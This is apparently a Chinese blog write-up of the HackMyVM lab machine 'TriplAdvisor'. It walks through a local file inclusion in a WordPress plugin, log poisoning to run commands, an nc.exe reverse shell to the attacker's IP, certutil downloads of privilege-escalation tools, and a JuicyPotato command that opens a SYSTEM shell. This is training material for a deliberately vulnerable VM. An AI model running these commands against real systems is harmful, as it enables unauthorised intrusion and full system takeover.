Hackmyvm-TriplAdvisor :简单

9.1 信息打点

nmap -sS 192.168.53.243 -p- -T4

图片[1]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

发现有一个http的域名解析,需要我们在hosts文件中添加好相关的信息

nmap -sS 192.168.53.243 -p 445,5985,8080 -T4 -A

图片[2]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

打开windows的hosts文件,添加如下信息

C:\Windows\System32\drivers\etc\hosts

图片[3]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

kali攻击机器中也不能忘了(方便渗透测试,windows中添加只是为了访问,当然也可以配置代理到kali)

echo "192.168.53.243 tripladvisor" >> /etc/hosts

图片[4]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

打开信息收集插件,发现这是一个wordpress内容管理系统

图片[5]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

wpscan进行可能的用户,后台密码爆破

wpscan --url http://tripladvisor:8080/wordpress/ -e u -P /usr/share/wordlists/fasttrack.txt

图片[6]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

wordpress版本信息已经被扫描出来了

图片[7]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

再使用详细扫描,发现一个插件

wpscan --url http://tripladvisor:8080/wordpress/

图片[8]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

9.2 漏洞利用

漏洞检索

searchsploit editor 1.1 wordpress
searchsploit -m 44340

图片[9]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

漏洞信息

┌──(root㉿kali)-[/data/demo]
└─# cat 44340.txt
Product: Site Editor WordPress Plugin - https://wordpress.org/plugins/site-editor/
Vendor: Site Editor
Tested version: 1.1.1
CVE ID: CVE-2018-7422

** CVE description **
A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.

** Technical details **
In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.

Vulnerable code:
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){
require_once $_REQUEST['ajax_path'];
}

https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5

By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.

** Proof of Concept **
http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

** Solution **
No fix available yet.

** Timeline **
03/01/2018: author contacted through siteeditor.org's contact form; no reply
16/01/2018: issue report filled on the public GitHub page with no technical details
18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail
19/01/2018: report sent; author says he will fix this issue "very soon"
31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply
14/02/2018: WP Plugins team contacted; no reply
06/03/2018: vendor contacted; no reply
07/03/2018: vendor contacted; no reply
15/03/2018: public disclosure

** Credits **
Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).

--
Best Regards,

Nicolas Buzy-Debat
Orange Cyberdefense Singapore (CERT-LEXSI)

存在文件包含漏洞,根据上面的url进行修改

http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

图片[10]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

因为这是windows系统,不存在/etc/passwd,那么怎么快速判断文件是否存在?

字典

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt

打开bp

图片[11]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

这里我们上传不了文件(没有账号密码),所以只能包含日志文件

c:/xampp/apache/logs/access.log

图片[12]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

9.3 反弹shell

使用curl写入日志,并包含日志文件,尝试获取命令执行结果,结果能正常执行命令

┌──(root㉿kali)-[/usr/share/wordlists]
└─# curl -A "" http://tripladvisor:8080/wordpress/
┌──(root㉿kali)-[/usr/share/wordlists]
└─# curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=c:/xampp/apache/logs/access.log"

图片[13]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

根据前面传msf马上去的经验,这里就传个nc吧

curl -A "" http://tripladvisor:8080/wordpress/
curl -A "" http://tripladvisor:8080/wordpress/
curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=\xampp\apache\logs\access.log"

图片[14]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

切换到当前用户的文件夹,可以看到第一个flag

图片[15]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

将这个shell利用nc传到msf中,进行本地漏扫(试一试,说不定就出来了呢,虽然它只在meterpreter后渗透模块中生效)

nc.exe 192.168.53.51 1234 -e cmd

图片[16]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

9.4 msf内核漏扫

msfconsole
use exploit/multi/handler # 加载handler模块
# 根据目标系统选择payload(nc反弹的是基础shell,非meterpreter)

# 目标是Windows,接收nc命令反弹的shell:
set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.53.51 # 攻击机IP(与nc反弹目标一致)
set LPORT 1234 # 监听端口(与nc反弹端口一致)
run -j # 启动监听,保持后台执行

use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块,估计这里没效果,目前测试只有meterpreter模块反弹的shell能用
set session 1 # 设置反弹成功的会话id为1,使用 sessions 即可查看所有的会话id

图片[17]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

9.5 土豆提权

certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET2.exe
certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET35.exe
certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET4.exe

图片[18]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

失败

.\GodPotato-NET4.exe -cmd "cmd /c whoami"
.\GodPotato-NET35.exe -cmd "cmd /c whoami"
.\GodPotato-NET2.exe -cmd "cmd /c whoami"

图片[19]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

9.6 JuicyPotato提权

certutil.exe -urlcache -split -f http://192.168.53.51:8000/JuicyPotato.exe
certutil.exe -urlcache -split -f http://192.168.53.51:8000/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.list

https://github.com/ohpe/juicy-potato/blob/master/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.list

然后用这个工具测试

certutil.exe -urlcache -split -f http://192.168.53.51:8000/juicy-potato/Test/test_clsid.bat

图片[20]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

图片[21]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

此时你的靶机上应该要有这三个文件

图片[22]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

此时验证一下,能否正常访问administrotar的文件,结果为拒绝访问(因为靶机限制了我不能使用whoami,所以只能这样验证)

图片[23]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

回到目录,执行此文件

图片[24]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

随便选择一个系统权限的clsid

图片[25]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

最终提权命令如下,kali记得开nc

JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\xampp\htdocs\wordpress\wp-content\plugins\editor\editor\extensions\pagebuilder\includes\nc.exe 192.168.53.51 4444 -e cmd.exe" -t *

图片[26]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

此时就可以访问管理员的文件了

图片[27]-Hackmyvm-TriplAdvisor :简单-泷羽Sec

往期推荐

全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细

HackMyVm-DC04 :简单

HackMyVm-DC03 :简单

HackMyVm-DC02 :简单

HackMyVm-DC01 :简单

HackMyVm-TriplAdvisor :简单

HackMyVm-Runas :简单

HackMyVm-Always :简单

HackMyVm-Nessus :简单

HackMyVm-Liar :简单

HackMyVm-Simple :简单

HackMyVm-Simple :简单

HackMyVm-Zero :简单

HackMyVm-OMG :简单

新版BurpSuite v2025.6.3汉化版,附激活教程

Fine!2025最新款信息收集综合工具

若依Vue漏洞检测工具v7更新

最好用的下一代目录爆破工具,全方位的目录爆破

集成MemProcFS,Vol2和Vol3的内存取证神器

重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器

x-waf,一个基于fuzz的waf绕过渗透工具

这10款内网穿透工具,一定有你没用过的

红队命令速查手册

挖SRC必须知道的25个漏洞提交平台

挖SRC必须知道的25个漏洞提交平台

FeatherScan v4.0 – 一款Linux内网全自动信息收集工具

掩日-适用于红队的综合免杀工具

2025最新渗透测试靶场推荐

近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等

【内网渗透】隐藏通信隧道技术

内网渗透必备,microsocks,一个轻量级的socks代理工具

神器分享 红队快速打点工具-DarKnuclei

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!

一个永久的渗透知识库

【oscp】vulnerable_docker,三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

内网渗透必备,microsocks,一个轻量级的socks代理工具

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学

不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

sql注入中各种waf的绕过方式,狗,盾,神,锁,宝

利用MySQL特性,WAF绕过技巧

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

大型翻车现场,十种waf绕过姿势,仅成功一种

喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容